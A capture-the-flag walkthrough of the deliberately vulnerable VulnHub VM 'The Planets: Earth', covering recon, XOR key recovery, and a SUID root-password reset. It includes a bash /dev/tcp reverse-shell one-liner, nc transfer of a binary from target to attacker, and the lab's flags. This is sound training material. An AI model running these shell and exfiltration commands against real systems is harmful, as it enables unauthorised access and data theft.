
VulnHub walkthrough notes (The Planets: Earth)

Author: ailx10
  • English name: The Planets: Earth
  • Chinese name: 行星:地球
  • Release date: 2 November 2021
  • Difficulty: easy
  • Description: Earth is an easy box, though you may find it more challenging than "Mercury" in this series, and on the harder side of easy depending on your experience. There are two flags on the box: a user flag and a root flag containing an MD5 hash. This has been tested on VirtualBox, so it may not work correctly on VMware. For any issues/questions or feedback, please email SirFlash at protonmail.com, though it may take me a while to reply.
  • Download: https://www.vulnhub.com/entry/the-planets-earth,755/

1. Discover the target IP address: one suspicious host found

  • earth.lan (192.168.199.179)
└─$ nmap -sP 192.168.199.0/24
Starting Nmap 7.92 ( https://nmap.org ) at 2022-08-20 13:21 CST
Nmap scan report for Hiwifi.lan (192.168.199.1)
Host is up (0.0027s latency).
Nmap scan report for 192.168.199.114
Host is up (0.0037s latency).
Nmap scan report for N3NXCV065297107.lan (192.168.199.151)
Host is up (0.0092s latency).
Nmap scan report for earth.lan (192.168.199.179)
Host is up (0.0020s latency).
Nmap scan report for kali.lan (192.168.199.247)
Host is up (0.00051s latency).
Nmap done: 256 IP addresses (5 hosts up) scanned in 2.70 seconds            

2. Port-scan the IP address: ports 22, 80 and 443 are open

$ nmap -A 192.168.199.179        
Starting Nmap 7.92 ( https://nmap.org ) at 2022-08-20 13:28 CST
Nmap scan report for earth.lan (192.168.199.179)
Host is up (0.61s latency).
Not shown: 933 filtered tcp ports (no-response), 64 filtered tcp ports (host-unreach)
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 8.6 (protocol 2.0)
| ssh-hostkey: 
|   256 5b:2c:3f:dc:8b:76:e9:21:7b:d0:56:24:df:be:e9:a8 (ECDSA)
|_  256 b0:3c:72:3b:72:21:26:ce:3a:84:e8:41:ec:c8:f8:41 (ED25519)
80/tcp  open  http     Apache httpd 2.4.51 ((Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9)
|_http-title: Bad Request (400)
|_http-server-header: Apache/2.4.51 (Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9
443/tcp open  ssl/http Apache httpd 2.4.51 ((Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9)
|_http-title: Bad Request (400)
| ssl-cert: Subject: commonName=earth.local/stateOrProvinceName=Space
| Subject Alternative Name: DNS:earth.local, DNS:terratest.earth.local
| Not valid before: 2021-10-12T23:26:31
|_Not valid after:  2031-10-10T23:26:31
|_http-server-header: Apache/2.4.51 (Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9
| tls-alpn: 
|_  http/1.1
|_ssl-date: TLS randomness does not represent time           

3. Before brute-forcing the site's paths, the hosts file must be configured (the TLS certificate names earth.local and terratest.earth.local)

192.168.199.179 terratest.earth.local
192.168.199.179 earth.local           

4. Brute-force results: port 80 has an admin back end, port 443 has the site's home page and a robots.txt

---- Scanning URL: http://terratest.earth.local/ ----
+ http://terratest.earth.local/admin (CODE:301|SIZE:0)     

+ https://terratest.earth.local/index.html (CODE:200|SIZE:26)                  
+ https://terratest.earth.local/robots.txt (CODE:200|SIZE:521)              

5. Visit the web pages; robots.txt reveals a testingnotes.* path

[Screenshot: home page]

[Screenshot: admin back end]

[Screenshot: robots.txt]

6. Following the hint, open testingnotes.txt, which yields two clues

  • Key clue: testdata.txt
  • Username clue: terra
[Screenshot: clue page (testingnotes.txt)]

Testing secure messaging system notes:
*Using XOR encryption as the algorithm, should be safe as used in RSA.
*Earth has confirmed they have received our sent messages.
*testdata.txt was used to test encryption.
*terra used as username for admin portal.
Todo:
*How do we send our monthly keys to Earth securely? Or should we change keys weekly?
*Need to test different key lengths to protect against bruteforce. How long should the key be?
*Need to improve the interface of the messaging interface and the admin panel, it's currently very basic.


7. Following the clue, open testdata.txt

[Screenshot: clue page (testdata.txt)]

According to radiometric dating estimation and other evidence, Earth formed over 4.5 billion years ago. Within the first billion years of Earth's history, life appeared in the oceans and began to affect Earth's atmosphere and surface, leading to the proliferation of anaerobic and, later, aerobic organisms. Some geological evidence indicates that life may have arisen as early as 4.1 billion years ago.

8. The home page holds three ciphertexts; using the hints above, recover the corresponding plaintexts

[Screenshot: the three ciphertexts on the home page]

Previous Messages: 
    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
    3714171e0b0a550a1859101d064b160a191a4b0908140d0e0d441c0d4b1611074318160814114b0a1d06170e1444010b0a0d441c104b150106104b1d011b100e59101d0205591314170e0b4a552a1f59071a16071d44130f041810550a05590555010a0d0c011609590d13430a171d170c0f0044160c1e150055011e100811430a59061417030d1117430910035506051611120b45
    2402111b1a0705070a41000a431a000a0e0a0f04104601164d050f070c0f15540d1018000000000c0c06410f0901420e105c0d074d04181a01041c170d4f4c2c0c13000d430e0e1c0a0006410b420d074d55404645031b18040a03074d181104111b410f000a4c41335d1c1d040f4e070d04521201111f1d4d031d090f010e00471c07001647481a0b412b1217151a531b4304001e151b171a4441020e030741054418100c130b1745081c541c0b0949020211040d1b410f090142030153091b4d150153040714110b174c2c0c13000d441b410f13080d12145c0d0708410f1d014101011a050d0a084d540906090507090242150b141c1d08411e010a0d1b120d110d1d040e1a450c0e410f090407130b5601164d00001749411e151c061e454d0011170c0a080d470a1006055a010600124053360e1f1148040906010e130c00090d4e02130b05015a0b104d0800170c0213000d104c1d050000450f01070b47080318445c090308410f010c12171a48021f49080006091a48001d47514c50445601190108011d451817151a104c080a0e5a           

9. XOR-decoding the three messages from the home page with the contents of testdata.txt as the key yields the hint earthclimatechangebad4humans (only the third message decodes cleanly; as the output shows, the first two degrade into garbage partway through)

b'According to radiometric dating estimation and other evidence, Earth formed over 4.5 billion years ago. Within the first billion years of Earth\'s hisCfy //}omo;/ppeare\'2~d;\x7ff$\'x,\x7fjj=*alf3,oq|y$w6&|%Qjvw+U <@f;y/j\x7fkr0~h<Pj1s.=\x06i\x97\xf3\xdcs-q,<j${ugn$u6&\x7f*+o\'erlj|mnn/?;-\'\x7f1%,f{kx8.`\x7fb)"\x8c\xe5\x99np`ust*yzd1}xbi:o{)~sh},^6#Tjcy7aj,yn>Hhu-\x17skl)$In*\'y/dybj7pt4~u"t=5jgh&#yx*+fwi=/eapyrncanxky\x7f8/k<\x0b6=+1\x80\xe8\xdaq*Ir8xo"P|7wfbn'
b"According to radiometric dating estimation and other evidence, Earth formed over 4.5 billion years ago. Within the first billion years of Earth's history, life appeared in the oceans and began to affect Earth's atmosphere and surface, leading to the prol^rrlj~<evy\x7f{&*xk|h$kaw-oc 0-'web146iqc$hte7af#`ec~)o>kFnkukzdt|a>y~ciyvb~jn$6O?0i~\x7fd|0v|$lx4~%5l3d*`mx6a8{vcketdia %e,{tr9x>q{1w$h&v~oaxx-)if4tv6pudk"
b'earthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimat'           

Reference decoding code:

import binascii

data1 = "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"
data2 = "3714171e0b0a550a1859101d064b160a191a4b0908140d0e0d441c0d4b1611074318160814114b0a1d06170e1444010b0a0d441c104b150106104b1d011b100e59101d0205591314170e0b4a552a1f59071a16071d44130f041810550a05590555010a0d0c011609590d13430a171d170c0f0044160c1e150055011e100811430a59061417030d1117430910035506051611120b45"
data3 = "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"

# The key is the raw content of testdata.txt (the text shown in step 7).
key = open('testdata.txt', 'rb').read()

def xor_decode(hex_ciphertext, key):
    # Byte-wise XOR aligned from the start of the message. zip() stops at the
    # shorter input, so a key shorter than the message only decodes its prefix.
    # (Converting through int()/hex() instead drops leading zero bytes and
    # aligns the XOR on the wrong end when the lengths differ.)
    ciphertext = binascii.unhexlify(hex_ciphertext)
    return bytes(c ^ k for c, k in zip(ciphertext, key))

for data in (data1, data2, data3):
    print(xor_decode(data, key))
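The testing notes above claim XOR is "safe as used in RSA", and step 9 shows it falling once the key (the contents of testdata.txt) is known. The following Python is an added example, not code from this writeup or from the box's author; the functions xor_bytes, decode_hex_message, recover_key_from_known_plaintext and crib_drag and the KEY/MSG1/MSG2 values are constructed for illustration. It performs the decode, then shows why the scheme fails: a message whose plaintext is known (here the repeated earthclimatechangebad4humans text) hands over the key bytes, and two messages under the same key cancel the key entirely, so a known fragment of one exposes the other. The last part goes beyond the box itself: it is the general key-reuse weakness, of which the box's three messages are one instance.

```python
from itertools import cycle


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """XOR every byte of data with the key, repeating the key if it is shorter."""
    if not key:
        raise ValueError("key must not be empty")
    return bytes(d ^ k for d, k in zip(data, cycle(key)))


def decode_hex_message(hex_ciphertext: str, key: bytes) -> bytes:
    """Decode a hex-encoded XOR ciphertext like the ones on the box's home page."""
    return xor_bytes(bytes.fromhex(hex_ciphertext), key)


def recover_key_from_known_plaintext(ciphertext: bytes, known_plaintext: bytes) -> bytes:
    """c = p XOR k, so c XOR p = k at every position where the plaintext is known."""
    n = min(len(ciphertext), len(known_plaintext))
    return bytes(c ^ p for c, p in zip(ciphertext[:n], known_plaintext[:n]))


def crib_drag(c1: bytes, c2: bytes, crib: bytes, offset: int = 0) -> bytes:
    """Key reuse: c1 XOR c2 == p1 XOR p2, the key cancels out.

    XORing a crib (a plaintext fragment known or guessed for one message) into
    that combination at the right offset reveals the other message's bytes there.
    """
    combined = bytes(a ^ b for a, b in zip(c1, c2))
    segment = combined[offset:offset + len(crib)]
    return bytes(s ^ k for s, k in zip(segment, crib))


# --- constructed sample values (hypothetical, not taken from the box) ---
KEY = b"According to radiometric dating estimation and other evidence, Earth formed"
MSG1 = b"terra: rotate the monthly key before sending it to Earth"
MSG2 = b"earthclimatechangebad4humans" * 2  # same length as MSG1 (56 bytes)

C1 = xor_bytes(MSG1, KEY)  # two messages encrypted under the same key
C2 = xor_bytes(MSG2, KEY)


def demo() -> dict:
    """Run the decode and both attacks; return the results for inspection."""
    return {
        "decoded_1": decode_hex_message(C1.hex(), KEY),
        # knowing MSG2 leaks the first 56 key bytes without ever seeing the key
        "leaked_key_prefix": recover_key_from_known_plaintext(C2, MSG2),
        # knowing only a 12-byte crib of MSG2 exposes the start of MSG1
        "crib_result": crib_drag(C1, C2, b"earthclimate", 0),
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value!r}")
```

Whether a fresh key is used per message is exactly the "how do we send our monthly keys" question from the notes: with a fresh, full-length key the crib_drag call returns noise, and the scheme degenerates into a one-time pad whose whole difficulty is key distribution.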

10. With the username and password, log in to the test page, which turns out to be a command-execution interface

[Screenshot: test back-end page]

11. Get a reverse shell with nc

Attacker machine:
nc -lvnp 4444
Target:
bash -i >& /dev/tcp/3232286711/4444 0>&1           

Here 3232286711 is the integer form of the attacker's IP address; reference code:

import socket
import struct

ip = "192.168.199.247"
# inet_aton returns the four address bytes in network (big-endian) order;
# unpacking them as a big-endian unsigned int gives the decimal form.
int_ip = struct.unpack("!I", socket.inet_aton(ip))[0]
print(int_ip)  # 3232286711

Shell obtained

[Screenshot: reverse shell obtained]

12. Search for the flag

find / -name "*flag*" 2>/dev/null           
[Screenshot: locating the flag file]

Location of the flag:

/var/earth_web/user_flag.txt           

View the flag:

cat /var/earth_web/user_flag.txt
[user_flag_3353b67d6437f07ba7d34afd7d2fc27d]           

13. Continue looking for the root flag: search for files with the SUID bit set

bash-5.1$ find / -perm -u=s 2>/dev/null
find / -perm -u=s 2>/dev/null
/usr/bin/chage
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/su
/usr/bin/mount
/usr/bin/umount
/usr/bin/pkexec
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/at
/usr/bin/sudo
/usr/bin/reset_root
/usr/sbin/grub2-set-bootflag
/usr/sbin/pam_timestamp_check
/usr/sbin/unix_chkpwd
/usr/sbin/mount.nfs
/usr/lib/polkit-1/polkit-agent-helper-1           

Run /usr/bin/reset_root

bash-5.1$ /usr/bin/reset_root
/usr/bin/reset_root
CHECKING IF RESET TRIGGERS PRESENT...
RESET FAILED, ALL TRIGGERS ARE NOT PRESENT.


14. Send reset_root back to the attacker machine to trace its execution, using nc's file-transfer capability

Attacker machine:
└─# nc -lvp 5555 >reset_root
listening on [any] 5555 ...
connect to [192.168.199.247] from terratest.earth.local [192.168.199.179] 53332

Target:
bash-5.1$ nc 192.168.199.247 5555 < /usr/bin/reset_root
nc 192.168.199.247 5555 < /usr/bin/reset_root
           

15. Debugging locally shows that the binary checks for three paths that do not exist:

  • /dev/shm/kHgTFI5G
  • /dev/shm/Zw7bV9U5
  • /tmp/kcM0Wewe
┌──(root㉿kali)-[/home/ailx10]
└─# ./reset_root          
zsh: 權限不夠: ./reset_root
                                                                                
┌──(root㉿kali)-[/home/ailx10]
└─# ls -hl reset_root 
-rw-r--r-- 1 root root 24K  8月 20 15:20 reset_root
                                                                                
┌──(root㉿kali)-[/home/ailx10]
└─# chmod +x reset_root   
                                                                                
┌──(root㉿kali)-[/home/ailx10]
└─# ./reset_root       
CHECKING IF RESET TRIGGERS PRESENT...
RESET FAILED, ALL TRIGGERS ARE NOT PRESENT.
                                                                                
┌──(root㉿kali)-[/home/ailx10]
└─# strace reset_root
strace: Can't stat 'reset_root': 沒有那個檔案或目錄
                                                                                
┌──(root㉿kali)-[/home/ailx10]
└─# strace ./reset_root
execve("./reset_root", ["./reset_root"], 0x7ffecb5955a0 /* 32 vars */) = 0
brk(NULL)                               = 0x7bd000
access("/etc/ld.so.preload", R_OK)      = -1 ENOENT (沒有那個檔案或目錄)
openat(AT_FDCWD, "/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3
newfstatat(3, "", {st_mode=S_IFREG|0644, st_size=87631, ...}, AT_EMPTY_PATH) = 0
mmap(NULL, 87631, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7fe7b3a83000
close(3)                                = 0
openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libc.so.6", O_RDONLY|O_CLOEXEC) = 3
read(3, "\177ELF\2\1\1\3\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0@y\2\0\0\0\0\0"..., 832) = 832
pread64(3, "\6\0\0\0\4\0\0\0@\0\0\0\0\0\0\0@\0\0\0\0\0\0\0@\0\0\0\0\0\0\0"..., 784, 64) = 784
pread64(3, "\4\0\0\0\20\0\0\0\5\0\0\0GNU\0\2\200\0\300\4\0\0\0\1\0\0\0\0\0\0\0", 32, 848) = 32
pread64(3, "\4\0\0\0\24\0\0\0\3\0\0\0GNU\0?\323\315\324#\241\204X\331\333:^P\242\263\300"..., 68, 880) = 68
newfstatat(3, "", {st_mode=S_IFREG|0755, st_size=1904752, ...}, AT_EMPTY_PATH) = 0
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fe7b3a81000
pread64(3, "\6\0\0\0\4\0\0\0@\0\0\0\0\0\0\0@\0\0\0\0\0\0\0@\0\0\0\0\0\0\0"..., 784, 64) = 784
mmap(NULL, 1938296, PROT_READ, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7fe7b38a7000
mprotect(0x7fe7b38cd000, 1724416, PROT_NONE) = 0
mmap(0x7fe7b38cd000, 1409024, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x26000) = 0x7fe7b38cd000
mmap(0x7fe7b3a25000, 311296, PROT_READ, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x17e000) = 0x7fe7b3a25000
mmap(0x7fe7b3a72000, 24576, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x1ca000) = 0x7fe7b3a72000
mmap(0x7fe7b3a78000, 33656, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x7fe7b3a78000
close(3)                                = 0
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fe7b38a5000
arch_prctl(ARCH_SET_FS, 0x7fe7b3a82580) = 0
mprotect(0x7fe7b3a72000, 12288, PROT_READ) = 0
mprotect(0x403000, 4096, PROT_READ)     = 0
mprotect(0x7fe7b3ac8000, 8192, PROT_READ) = 0
munmap(0x7fe7b3a83000, 87631)           = 0
newfstatat(1, "", {st_mode=S_IFCHR|0620, st_rdev=makedev(0x88, 0x2), ...}, AT_EMPTY_PATH) = 0
brk(NULL)                               = 0x7bd000
brk(0x7de000)                           = 0x7de000
write(1, "CHECKING IF RESET TRIGGERS PRESE"..., 38CHECKING IF RESET TRIGGERS PRESENT...
) = 38
access("/dev/shm/kHgTFI5G", F_OK)       = -1 ENOENT (沒有那個檔案或目錄)
access("/dev/shm/Zw7bV9U5", F_OK)       = -1 ENOENT (沒有那個檔案或目錄)
access("/tmp/kcM0Wewe", F_OK)           = -1 ENOENT (沒有那個檔案或目錄)
write(1, "RESET FAILED, ALL TRIGGERS ARE N"..., 44RESET FAILED, ALL TRIGGERS ARE NOT PRESENT.
) = 44
exit_group(0)                           = ?
+++ exited with 0 +++           
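The strace output above is long, and the three access() calls that decide the binary's behaviour are easy to miss. The following Python is an added example (not part of the original writeup): a small parser for strace lines that lists every path the program probed and failed to find, and flags those under directories any local user can write to. The SAMPLE_TRACE lines are constructed in the shape of the trace above with English strerror text; the function and constant names are the example's own. From a hardening standpoint, a SUID binary whose control flow depends on the existence of files in /tmp or /dev/shm is the finding to report, regardless of what it then does.

```python
import re

# Constructed sample in the shape of the strace output above (English locale).
SAMPLE_TRACE = """\
execve("./reset_root", ["./reset_root"], 0x7ffecb5955a0 /* 32 vars */) = 0
access("/etc/ld.so.preload", R_OK)      = -1 ENOENT (No such file or directory)
openat(AT_FDCWD, "/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3
newfstatat(3, "", {st_mode=S_IFREG|0644, st_size=87631, ...}, AT_EMPTY_PATH) = 0
brk(NULL)                               = 0x7bd000
access("/dev/shm/kHgTFI5G", F_OK)       = -1 ENOENT (No such file or directory)
access("/dev/shm/Zw7bV9U5", F_OK)       = -1 ENOENT (No such file or directory)
access("/tmp/kcM0Wewe", F_OK)           = -1 ENOENT (No such file or directory)
exit_group(0)                           = ?
"""

# syscall(args) = retval [ERRNO (text)]
LINE_RE = re.compile(r'^(?P<call>\w+)\((?P<args>.*)\)\s*=\s*(?P<ret>\S+)(?:\s+(?P<err>E[A-Z]+))?')
PATH_RE = re.compile(r'"([^"]*)"')

# syscalls whose first quoted argument is a filesystem path being looked up
PROBE_CALLS = {"access", "stat", "lstat", "newfstatat", "open", "openat", "readlink"}

# locations where an unprivileged local user can create files and directories
USER_WRITABLE_PREFIXES = ("/tmp/", "/var/tmp/", "/dev/shm/")


def parse_probes(trace: str) -> list:
    """Return (syscall, path, errno-or-None) for every path lookup in the trace."""
    probes = []
    for line in trace.splitlines():
        m = LINE_RE.match(line)
        if not m or m.group("call") not in PROBE_CALLS:
            continue
        p = PATH_RE.search(m.group("args"))
        if not p or not p.group(1):      # skip calls with no path or an empty one
            continue
        probes.append((m.group("call"), p.group(1), m.group("err")))
    return probes


def missing_paths(trace: str) -> list:
    """Paths the program looked for but which did not exist."""
    return [path for _, path, err in parse_probes(trace) if err == "ENOENT"]


def attacker_creatable(paths: list) -> list:
    """Subset of paths that any local user could create to change the program's behaviour."""
    return [p for p in paths if p.startswith(USER_WRITABLE_PREFIXES)]


if __name__ == "__main__":
    missing = missing_paths(SAMPLE_TRACE)
    print("missing:", missing)
    print("user-creatable triggers:", attacker_creatable(missing))
```

The same parser works on a full trace captured with `strace -f -o trace.txt ./binary`; lines from a non-English locale still match because the regex keys on the errno symbol, not on the strerror text.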

So create them (the first mkdir in the transcript below uses the relative path dev/shm/kHgTFI5G; the path the binary actually checks is /dev/shm/kHgTFI5G):

bash-5.1$ mkdir dev/shm/kHgTFI5G
mkdir dev/shm/kHgTFI5G
bash-5.1$ mkdir /dev/shm/Zw7bV9U5
mkdir /dev/shm/Zw7bV9U5
bash-5.1$ mkdir /tmp/kcM0Wewe
mkdir /tmp/kcM0Wewe           

16. Try resetting the root password again

/usr/bin/reset_root
CHECKING IF RESET TRIGGERS PRESENT...
RESET TRIGGERS ARE PRESENT, RESETTING ROOT PASSWORD TO: Earth


Root password obtained: Earth

17. Switch to root with the recovered password and search for the flag again

su root
[Screenshot: switched to root]

cat /root/root_flag.txt

              _-o#&&*''''?d:>b\_
          _o/"`''  '',, dMF9MMMMMHo_
       .o&#'        `"MbHMMMMMMMMMMMHo.
     .o"" '         vodM*&HMMMMMMMMMM?.
    ,'              $M&ood,~'`(&##MMMMMMH\
   /               ,MMMMMMM#b?#bobMMMMHMMML
  &              ?MMMMMMMMMMMMMMMMM7MMM$R*Hk
 ?$.            :MMMMMMMMMMMMMMMMMMM/HMMM|`*L
|               |MMMMMMMMMMMMMMMMMMMMbMH'   T,
$H#:            `*MMMMMMMMMMMMMMMMMMMMb#}'  `?
]MMH#             ""*""""*#MMMMMMMMMMMMM'    -
MMMMMb_                   |MMMMMMMMMMMP'     :
HMMMMMMMHo                 `MMMMMMMMMT       .
?MMMMMMMMP                  9MMMMMMMM}       -
-?MMMMMMM                  |MMMMMMMMM?,d-    '
 :|MMMMMM-                 `MMMMMMMT .M|.   :
  .9MMM[                    &MMMMM*' `'    .
   :9MMk                    `MMM#"        -
     &M}                     `          .-
      `&.                             .
        `~,   .                     ./
            . _                  .-
              '`--._,dd###pp=""'

Congratulations on completing Earth!
If you have any feedback please contact me at [email protected]
[root_flag_b0da9554d29db2117b02aa8b66ec492e]
           

With that, the exercise is complete.

Published 2022-08-20 15:39